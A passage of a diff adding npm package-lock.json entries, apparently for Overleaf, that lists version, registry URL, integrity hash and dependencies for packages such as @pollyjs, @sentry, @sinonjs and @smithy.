"node_modules/@pollyjs/adapter-node-http": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/adapter-node-http/-/adapter-node-http-6.0.6.tgz", + "integrity": "sha512-jdJG7oncmSHZAtVMmRgOxh5A56b7G8H9ULlk/ZaVJ+jNrlFXhLmPpx8OQoSF4Cuq2ugdiWmwmAjFXHStcpY3Mw==", + "dev": true, + "dependencies": { + "@pollyjs/adapter": "^6.0.6", + "@pollyjs/utils": "^6.0.6", + "lodash-es": "^4.17.21", + "nock": "^13.2.1" + } + }, + "node_modules/@pollyjs/core": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/core/-/core-6.0.6.tgz", + "integrity": "sha512-1ZZcmojW8iSFmvHGeLlvuudM3WiDV842FsVvtPAo3HoAYE6jCNveLHJ+X4qvonL4enj1SyTF3hXA107UkQFQrA==", + "dev": true, + "dependencies": { + "@pollyjs/utils": "^6.0.6", + "@sindresorhus/fnv1a": "^2.0.1", + "blueimp-md5": "^2.19.0", + "fast-json-stable-stringify": "^2.1.0", + "is-absolute-url": "^3.0.3", + "lodash-es": "^4.17.21", + "loglevel": "^1.8.0", + "route-recognizer": "^0.3.4", + "slugify": "^1.6.3" + } + }, + "node_modules/@pollyjs/node-server": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/node-server/-/node-server-6.0.6.tgz", + "integrity": "sha512-nkP1+hdNoVOlrRz9R84haXVsaSmo8Xmq7uYK9GeUMSLQy4Fs55ZZ9o2KI6vRA8F6ZqJSbC31xxwwIoTkjyP7Vg==", + "dev": true, + "dependencies": { + "@pollyjs/utils": "^6.0.6", + "body-parser": "^1.19.0", + "cors": "^2.8.5", + "express": "^4.17.1", + "fs-extra": "^10.0.0", + "http-graceful-shutdown": "^3.1.5", + "morgan": "^1.10.0", + "nocache": "^3.0.1" + } + }, + "node_modules/@pollyjs/node-server/node_modules/nocache": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/nocache/-/nocache-3.0.4.tgz", + "integrity": "sha512-WDD0bdg9mbq6F4mRxEYcPWwfA1vxd0mrvKOyxI7Xj/atfRHVeutzuWByG//jfm4uPzp0y4Kj051EORCBSQMycw==", + "dev": true, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@pollyjs/persister": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/persister/-/persister-6.0.6.tgz", + "integrity": "sha512-9KB1p+frvYvFGur4ifzLnFKFLXAMXrhAhCnVhTnkG2WIqqQPT7y+mKBV/DKCmYFx8GPA9FiNGqt2pB53uJpIdw==", + "dev": true, + "dependencies": { + "@pollyjs/utils": "^6.0.6", + "@types/set-cookie-parser": "^2.4.1", + "bowser": "^2.4.0", + "fast-json-stable-stringify": "^2.1.0", + "lodash-es": "^4.17.21", + "set-cookie-parser": "^2.4.8", + "utf8-byte-length": "^1.0.4" + } + }, + "node_modules/@pollyjs/persister-fs": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/persister-fs/-/persister-fs-6.0.6.tgz", + "integrity": "sha512-/ALVgZiH2zGqwLkW0Mntc0Oq1v7tR8LS8JD2SAyIsHpnSXeBUnfPWwjAuYw0vqORHFVEbwned6MBRFfvU/3qng==", + "dev": true, + "dependencies": { + "@pollyjs/node-server": "^6.0.6", + "@pollyjs/persister": "^6.0.6" + } + }, + "node_modules/@pollyjs/utils": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/utils/-/utils-6.0.6.tgz", + "integrity": "sha512-nhVJoI3nRgRimE0V2DVSvsXXNROUH6iyJbroDu4IdsOIOFC1Ds0w+ANMB4NMwFaqE+AisWOmXFzwAGdAfyiQVg==", + "dev": true, + "dependencies": { + "qs": "^6.10.1", + "url-parse": "^1.5.3" + } + }, + "node_modules/@popperjs/core": { + "version": "2.11.8", + "resolved": "https://registry.npmjs.org/@popperjs/core/-/core-2.11.8.tgz", + "integrity": "sha512-P1st0aksCrn9sGZhp8GMYwBnQsbvAWsZAX44oXNNvLHGqAOcoVxmjZiohstwQ7SqKnbR47akdNi+uleWD8+g6A==", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/popperjs" + } + }, + "node_modules/@protobufjs/aspromise": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/@protobufjs/aspromise/-/aspromise-1.1.2.tgz", + "integrity": "sha1-m4sMxmPWaafY9vXQiToU00jzD78=" + }, + "node_modules/@protobufjs/base64": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/@protobufjs/base64/-/base64-1.1.2.tgz", + "integrity": "sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg==" + }, + "node_modules/@protobufjs/codegen": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/@protobufjs/codegen/-/codegen-2.0.4.tgz", + "integrity": "sha512-YyFaikqM5sH0ziFZCN3xDC7zeGaB/d0IUb9CATugHWbd1FRFwWwt4ld4OYMPWu5a3Xe01mGAULCdqhMlPl29Jg==" + }, + "node_modules/@protobufjs/eventemitter": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@protobufjs/eventemitter/-/eventemitter-1.1.0.tgz", + "integrity": "sha1-NVy8mLr61ZePntCV85diHx0Ga3A=" + }, + "node_modules/@protobufjs/fetch": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@protobufjs/fetch/-/fetch-1.1.0.tgz", + "integrity": "sha1-upn7WYYUr2VwDBYZ/wbUVLDYTEU=", + "dependencies": { + "@protobufjs/aspromise": "^1.1.1", + "@protobufjs/inquire": "^1.1.0" + } + }, + "node_modules/@protobufjs/float": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@protobufjs/float/-/float-1.0.2.tgz", + "integrity": "sha1-Xp4avctz/Ap8uLKR33jIy9l7h9E=" + }, + "node_modules/@protobufjs/inquire": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@protobufjs/inquire/-/inquire-1.1.0.tgz", + "integrity": "sha1-/yAOPnzyQp4tyvwRQIKOjMY48Ik=" + }, + "node_modules/@protobufjs/path": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/@protobufjs/path/-/path-1.1.2.tgz", + "integrity": "sha1-bMKyDFya1q0NzP0hynZz2Nf79o0=" + }, + "node_modules/@protobufjs/pool": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@protobufjs/pool/-/pool-1.1.0.tgz", + "integrity": "sha1-Cf0V8tbTq/qbZbw2ZQbWrXhG/1Q=" + }, + "node_modules/@protobufjs/utf8": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@protobufjs/utf8/-/utf8-1.1.0.tgz", + "integrity": "sha1-p3c2C1s5oaLlEG+OhY8v0tBgxXA=" + }, + "node_modules/@react-aria/ssr": { + "version": "3.9.4", + "resolved": "https://registry.npmjs.org/@react-aria/ssr/-/ssr-3.9.4.tgz", + "integrity": "sha512-4jmAigVq409qcJvQyuorsmBR4+9r3+JEC60wC+Y0MZV0HCtTmm8D9guYXlJMdx0SSkgj0hHAyFm/HvPNFofCoQ==", + "dev": true, + "dependencies": { + "@swc/helpers": "^0.5.0" + }, + "engines": { + "node": ">= 12" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0-rc.1 || ^18.0.0" + } + }, + "node_modules/@react-dnd/asap": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/@react-dnd/asap/-/asap-5.0.2.tgz", + "integrity": "sha512-WLyfoHvxhs0V9U+GTsGilGgf2QsPl6ZZ44fnv0/b8T3nQyvzxidxsg/ZltbWssbsRDlYW8UKSQMTGotuTotZ6A==", + "dev": true + }, + "node_modules/@react-dnd/invariant": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/@react-dnd/invariant/-/invariant-4.0.2.tgz", + "integrity": "sha512-xKCTqAK/FFauOM9Ta2pswIyT3D8AQlfrYdOi/toTPEhqCuAs1v5tcJ3Y08Izh1cJ5Jchwy9SeAXmMg6zrKs2iw==", + "dev": true + }, + "node_modules/@react-dnd/shallowequal": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/@react-dnd/shallowequal/-/shallowequal-4.0.2.tgz", + "integrity": "sha512-/RVXdLvJxLg4QKvMoM5WlwNR9ViO9z8B/qPcc+C0Sa/teJY7QG7kJ441DwzOjMYEY7GmU4dj5EcGHIkKZiQZCA==", + "dev": true + }, + "node_modules/@remix-run/router": { + "version": "1.19.1", + "resolved": "https://registry.npmjs.org/@remix-run/router/-/router-1.19.1.tgz", + "integrity": "sha512-S45oynt/WH19bHbIXjtli6QmwNYvaz+vtnubvNpNDvUOoA/OWh6j1OikIP3G+v5GHdxyC6EXoChG3HgYGEUfcg==", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@replit/codemirror-emacs": { + "version": "6.0.0", + "resolved": "git+ssh://git@github.com/overleaf/codemirror-emacs.git#4394c03858f27053f8768258e9493866e06e938e", + "integrity": "sha512-5rEKNeFfYPi3ytelXa5IIXnRu5Wvpzz80W1xa9k7gorC2wHlFRveIiIeXdwcQQw92pe5cT5vtpldLLZW5xcAIg==", + "dev": true, + "peerDependencies": { + "@codemirror/autocomplete": "^6.0.2", + "@codemirror/commands": "^6.0.0", + "@codemirror/search": "^6.0.0", + "@codemirror/state": "^6.0.1", + "@codemirror/view": "^6.3.0" + } + }, + "node_modules/@replit/codemirror-indentation-markers": { + "version": "6.5.3", + "resolved": "git+ssh://git@github.com/overleaf/codemirror-indentation-markers.git#78264032eb286bc47871569ae87bff5ca1c6c161", + "integrity": "sha512-M64D1BO2iLWI0ByW4oiiRj104pulG+07FZOz+NfkJMY2zmrbsidKii/8Ibwmp7kEuWY1n7STtTtWxqZZB/HsjA==", + "dev": true, + "peerDependencies": { + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.0.0" + } + }, + "node_modules/@replit/codemirror-vim": { + "version": "6.2.1", + "resolved": "git+ssh://git@github.com/overleaf/codemirror-vim.git#1bef138382d948018f3f9b8a4d7a70ab61774e4b", + "integrity": "sha512-ATm1ZFJptmNcNlGKMFsCFQv41PYKBlDwC5pPKpceSEwws0yX2pS1FrV/cMikT9Ylw15s3grYUibYX3ObHZq8sQ==", + "dev": true, + "peerDependencies": { + "@codemirror/commands": "^6.0.0", + "@codemirror/language": "^6.1.0", + "@codemirror/search": "^6.2.0", + "@codemirror/state": "^6.0.1", + "@codemirror/view": "^6.0.3" + } + }, + "node_modules/@restart/hooks": { + "version": "0.4.16", + "resolved": "https://registry.npmjs.org/@restart/hooks/-/hooks-0.4.16.tgz", + "integrity": "sha512-f7aCv7c+nU/3mF7NWLtVVr0Ra80RqsO89hO72r+Y/nvQr5+q0UFGkocElTH6MJApvReVh6JHUFYn2cw1WdHF3w==", + "dev": true, + "dependencies": { + "dequal": "^2.0.3" + }, + "peerDependencies": { + "react": ">=16.8.0" + } + }, + "node_modules/@restart/ui": { + "version": "1.6.9", + "resolved": "https://registry.npmjs.org/@restart/ui/-/ui-1.6.9.tgz", + "integrity": "sha512-mUbygUsJcRurjZCt1f77gg4DpheD1D+Sc7J3JjAkysUj7t8m4EBJVOqWC9788Qtbc69cJ+HlJc6jBguKwS8Mcw==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.21.0", + "@popperjs/core": "^2.11.6", + "@react-aria/ssr": "^3.5.0", + "@restart/hooks": "^0.4.9", + "@types/warning": "^3.0.0", + "dequal": "^2.0.3", + "dom-helpers": "^5.2.0", + "uncontrollable": "^8.0.1", + "warning": "^4.0.3" + }, + "peerDependencies": { + "react": ">=16.14.0", + "react-dom": ">=16.14.0" + } + }, + "node_modules/@restart/ui/node_modules/dom-helpers": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/dom-helpers/-/dom-helpers-5.2.1.tgz", + "integrity": "sha512-nRCa7CK3VTrM2NmGkIy4cbK7IZlgBE/PYMn55rrXefr5xXDP0LdtfPnblFDoVdcAfslJ7or6iqAUnx0CCGIWQA==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.8.7", + "csstype": "^3.0.2" + } + }, + "node_modules/@restart/ui/node_modules/uncontrollable": { + "version": "8.0.4", + "resolved": "https://registry.npmjs.org/uncontrollable/-/uncontrollable-8.0.4.tgz", + "integrity": "sha512-ulRWYWHvscPFc0QQXvyJjY6LIXU56f0h8pQFvhxiKk5V1fcI8gp9Ht9leVAhrVjzqMw0BgjspBINx9r6oyJUvQ==", + "dev": true, + "peerDependencies": { + "react": ">=16.14.0" + } + }, + "node_modules/@restart/ui/node_modules/warning": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/warning/-/warning-4.0.3.tgz", + "integrity": "sha512-rpJyN222KWIvHJ/F53XSZv0Zl/accqHR8et1kpaMTD/fLCRxtV8iX8czMzY7sVZupTI3zcUTg8eycS2kNF9l6w==", + "dev": true, + "dependencies": { + "loose-envify": "^1.0.0" + } + }, + "node_modules/@sentry-internal/tracing": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry-internal/tracing/-/tracing-7.46.0.tgz", + "integrity": "sha512-KYoppa7PPL8Er7bdPoxTNUfIY804JL7hhOEomQHYD22rLynwQ4AaLm3YEY75QWwcGb0B7ZDMV+tSumW7Rxuwuw==", + "dev": true, + "dependencies": { + "@sentry/core": "7.46.0", + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry-internal/tracing/node_modules/@sentry/core": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/core/-/core-7.46.0.tgz", + "integrity": "sha512-BnNHGh/ZTztqQedFko7vb2u6yLs/kWesOQNivav32ZbsEpVCjcmG1gOJXh2YmGIvj3jXOC9a4xfIuh+lYFcA6A==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry-internal/tracing/node_modules/@sentry/types": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/types/-/types-7.46.0.tgz", + "integrity": "sha512-2FMEMgt2h6u7AoELhNhu9L54GAh67KKfK2pJ1kEXJHmWxM9FSCkizjLs/t+49xtY7jEXr8qYq8bV967VfDPQ9g==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry-internal/tracing/node_modules/@sentry/utils": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/utils/-/utils-7.46.0.tgz", + "integrity": "sha512-elRezDAF84guMG0OVIIZEWm6wUpgbda4HGks98CFnPsrnMm3N1bdBI9XdlxYLtf+ir5KsGR5YlEIf/a0kRUwAQ==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry-internal/tracing/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "node_modules/@sentry/replay": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/replay/-/replay-7.46.0.tgz", + "integrity": "sha512-rHsAFdeEu47JRy6mEwwN+M+zTTWlOFWw9sR/eDCvik2lxAXBN2mXvf/N/MN9zQB3+QnS13ke+SvwVW7CshLOXg==", + "dev": true, + "dependencies": { + "@sentry/core": "7.46.0", + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@sentry/replay/node_modules/@sentry/core": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/core/-/core-7.46.0.tgz", + "integrity": "sha512-BnNHGh/ZTztqQedFko7vb2u6yLs/kWesOQNivav32ZbsEpVCjcmG1gOJXh2YmGIvj3jXOC9a4xfIuh+lYFcA6A==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry/replay/node_modules/@sentry/types": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/types/-/types-7.46.0.tgz", + "integrity": "sha512-2FMEMgt2h6u7AoELhNhu9L54GAh67KKfK2pJ1kEXJHmWxM9FSCkizjLs/t+49xtY7jEXr8qYq8bV967VfDPQ9g==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry/replay/node_modules/@sentry/utils": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/utils/-/utils-7.46.0.tgz", + "integrity": "sha512-elRezDAF84guMG0OVIIZEWm6wUpgbda4HGks98CFnPsrnMm3N1bdBI9XdlxYLtf+ir5KsGR5YlEIf/a0kRUwAQ==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry/replay/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "node_modules/@sideway/address": { + "version": "4.1.4", + "resolved": "https://registry.npmjs.org/@sideway/address/-/address-4.1.4.tgz", + "integrity": "sha512-7vwq+rOHVWjyXxVlR76Agnvhy8I9rpzjosTESvmhNeXOXdZZB15Fl+TI9x1SiHZH5Jv2wTGduSxFDIaq0m3DUw==", + "dependencies": { + "@hapi/hoek": "^9.0.0" + } + }, + "node_modules/@sideway/formula": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@sideway/formula/-/formula-3.0.1.tgz", + "integrity": "sha512-/poHZJJVjx3L+zVD6g9KgHfYnb443oi7wLu/XKojDviHy6HOEOA6z1Trk5aR1dGcmPenJEgb2sK2I80LeS3MIg==" + }, + "node_modules/@sideway/pinpoint": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/@sideway/pinpoint/-/pinpoint-2.0.0.tgz", + "integrity": "sha512-RNiOoTPkptFtSVzQevY/yWtZwf/RxyVnPy/OcA9HBM3MlGDnBEYL5B41H0MTn0Uec8Hi+2qUtTfG2WWZBmMejQ==" + }, + "node_modules/@sinclair/typebox": { + "version": "0.27.8", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", + "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", + "dev": true + }, + "node_modules/@sindresorhus/fnv1a": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@sindresorhus/fnv1a/-/fnv1a-2.0.1.tgz", + "integrity": "sha512-suq9tRQ6bkpMukTG5K5z0sPWB7t0zExMzZCdmYm6xTSSIm/yCKNm7VCL36wVeyTsFr597/UhU1OAYdHGMDiHrw==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/@sindresorhus/merge-streams": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/@sindresorhus/merge-streams/-/merge-streams-2.3.0.tgz", + "integrity": "sha512-LtoMMhxAlorcGhmFYI+LhPgbPZCkgP6ra1YL604EeF6U98pLlQ3iWIGMdWSC+vWmPBWBNgmDBAhnAobLROJmwg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@sinonjs/commons": { + "version": "1.8.3", + "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-1.8.3.tgz", + "integrity": "sha512-xkNcLAn/wZaX14RPlwizcKicDk9G3F8m2nU3L7Ukm5zBgTwiT0wsoFAHx9Jq56fJA1z/7uKGtCRu16sOUCLIHQ==", + "dev": true, + "dependencies": { + "type-detect": "4.0.8" + } + }, + "node_modules/@sinonjs/fake-timers": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-6.0.1.tgz", + "integrity": "sha512-MZPUxrmFubI36XS1DI3qmI0YdN1gks62JtFZvxR67ljjSNCeK6U08Zx4msEWOXuofgqUt6zPHSi1H9fbjR/NRA==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.0" + } + }, + "node_modules/@sinonjs/formatio": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/@sinonjs/formatio/-/formatio-5.0.1.tgz", + "integrity": "sha512-KaiQ5pBf1MpS09MuA0kp6KBQt2JUOQycqVG1NZXvzeaXe5LGFqAKueIS0bw4w0P9r7KuBSVdUk5QjXsUdu2CxQ==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1", + "@sinonjs/samsam": "^5.0.2" + } + }, + "node_modules/@sinonjs/samsam": { + "version": "5.3.1", + "resolved": "https://registry.npmjs.org/@sinonjs/samsam/-/samsam-5.3.1.tgz", + "integrity": "sha512-1Hc0b1TtyfBu8ixF/tpfSHTVWKwCBLY4QJbkgnE7HcwyvT2xArDxb4K7dMgqRm3szI+LJbzmW/s4xxEhv6hwDg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.6.0", + "lodash.get": "^4.4.2", + "type-detect": "^4.0.8" + } + }, + "node_modules/@sinonjs/text-encoding": { + "version": "0.7.1", + "resolved": "https://registry.npmjs.org/@sinonjs/text-encoding/-/text-encoding-0.7.1.tgz", + "integrity": "sha512-+iTbntw2IZPb/anVDbypzfQa+ay64MW0Zo8aJ8gZPWMMK6/OubMVb6lUPMagqjOPnmtauXnFCACVl3O7ogjeqQ==", + "dev": true + }, + "node_modules/@slack/types": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/@slack/types/-/types-2.10.0.tgz", + "integrity": "sha512-JXY9l49rf7dDgvfMZi0maFyugzGkvq0s5u+kDlD68WaRUhjZNLBDKZcsrycMsVVDFfyOK0R1UKkYGmy9Ph069Q==", + "engines": { + "node": ">= 12.13.0", + "npm": ">= 6.12.0" + } + }, + "node_modules/@slack/webhook": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/@slack/webhook/-/webhook-7.0.2.tgz", + "integrity": "sha512-dsrO/ow6a6+xkLm/lZKbUNTsFJlBc679tD+qwlVTztsQkDxPLH6odM7FKALz1IHa+KpLX8HKUIPV13a7y7z29w==", + "dependencies": { + "@slack/types": "^2.9.0", + "@types/node": ">=18.0.0", + "axios": "^1.6.3" + }, + "engines": { + "node": ">= 18", + "npm": ">= 8.6.0" + } + }, + "node_modules/@smithy/abort-controller": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/abort-controller/-/abort-controller-1.0.2.tgz", + "integrity": "sha512-tb2h0b+JvMee+eAxTmhnyqyNk51UXIK949HnE14lFeezKsVJTB30maan+CO2IMwnig2wVYQH84B5qk6ylmKCuA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/config-resolver": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/config-resolver/-/config-resolver-1.0.2.tgz", + "integrity": "sha512-8Bk7CgnVKg1dn5TgnjwPz2ebhxeR7CjGs5yhVYH3S8x0q8yPZZVWwpRIglwXaf5AZBzJlNO1lh+lUhMf2e73zQ==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "@smithy/util-config-provider": "^1.0.2", + "@smithy/util-middleware": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/credential-provider-imds": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/credential-provider-imds/-/credential-provider-imds-1.0.2.tgz", + "integrity": "sha512-fLjCya+JOu2gPJpCiwSUyoLvT8JdNJmOaTOkKYBZoGf7CzqR6lluSyI+eboZnl/V0xqcfcqBG4tgqCISmWS3/w==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/node-config-provider": "^1.0.2", + "@smithy/property-provider": "^1.0.2", + "@smithy/types": "^1.1.1", + "@smithy/url-parser": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/eventstream-codec": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/eventstream-codec/-/eventstream-codec-1.0.2.tgz", + "integrity": "sha512-eW/XPiLauR1VAgHKxhVvgvHzLROUgTtqat2lgljztbH8uIYWugv7Nz+SgCavB+hWRazv2iYgqrSy74GvxXq/rg==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/crc32": "3.0.0", + "@smithy/types": "^1.1.1", + "@smithy/util-hex-encoding": "^1.0.2", + "tslib": "^2.5.0" + } + }, + "node_modules/@smithy/fetch-http-handler": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/fetch-http-handler/-/fetch-http-handler-1.0.2.tgz", + "integrity": "sha512-kynyofLf62LvR8yYphPPdyHb8fWG3LepFinM/vWUTG2Q1pVpmPCM530ppagp3+q2p+7Ox0UvSqldbKqV/d1BpA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/protocol-http": "^1.1.1", + "@smithy/querystring-builder": "^1.0.2", + "@smithy/types": "^1.1.1", + "@smithy/util-base64": "^1.0.2", + "tslib": "^2.5.0" + } + }, + "node_modules/@smithy/hash-node": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/hash-node/-/hash-node-1.0.2.tgz", + "integrity": "sha512-K6PKhcUNrJXtcesyzhIvNlU7drfIU7u+EMQuGmPw6RQDAg/ufUcfKHz4EcUhFAodUmN+rrejhRG9U6wxjeBOQA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "@smithy/util-buffer-from": "^1.0.2", + "@smithy/util-utf8": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/invalid-dependency": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/invalid-dependency/-/invalid-dependency-1.0.2.tgz", + "integrity": "sha512-B1Y3Tsa6dfC+Vvb+BJMhTHOfFieeYzY9jWQSTR1vMwKkxsymD0OIAnEw8rD/RiDj/4E4RPGFdx9Mdgnyd6Bv5Q==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + } + }, + "node_modules/@smithy/is-array-buffer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/is-array-buffer/-/is-array-buffer-1.0.2.tgz", + "integrity": "sha512-pkyBnsBRpe+c/6ASavqIMRBdRtZNJEVJOEzhpxZ9JoAXiZYbkfaSMRA/O1dUxGdJ653GHONunnZ4xMo/LJ7utQ==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/middleware-content-length": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/middleware-content-length/-/middleware-content-length-1.0.2.tgz", + "integrity": "sha512-pa1/SgGIrSmnEr2c9Apw7CdU4l/HW0fK3+LKFCPDYJrzM0JdYpqjQzgxi31P00eAkL0EFBccpus/p1n2GF9urw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/protocol-http": "^1.1.1", + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/middleware-endpoint": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@smithy/middleware-endpoint/-/middleware-endpoint-1.0.3.tgz", + "integrity": "sha512-GsWvTXMFjSgl617PCE2km//kIjjtvMRrR2GAuRDIS9sHiLwmkS46VWaVYy+XE7ubEsEtzZ5yK2e8TKDR6Qr5Lw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/middleware-serde": "^1.0.2", + "@smithy/types": "^1.1.1", + "@smithy/url-parser": "^1.0.2", + "@smithy/util-middleware": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/middleware-retry": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@smithy/middleware-retry/-/middleware-retry-1.0.4.tgz", + "integrity": "sha512-G7uRXGFL8c3F7APnoIMTtNAHH8vT4F2qVnAWGAZaervjupaUQuRRHYBLYubK0dWzOZz86BtAXKieJ5p+Ni2Xpg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/protocol-http": "^1.1.1", + "@smithy/service-error-classification": "^1.0.3", + "@smithy/types": "^1.1.1", + "@smithy/util-middleware": "^1.0.2", + "@smithy/util-retry": "^1.0.4", + "tslib": "^2.5.0", + "uuid": "^8.3.2" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/middleware-retry/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "optional": true, + "peer": true, + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@smithy/middleware-serde": { + "version": "1.0.2", + 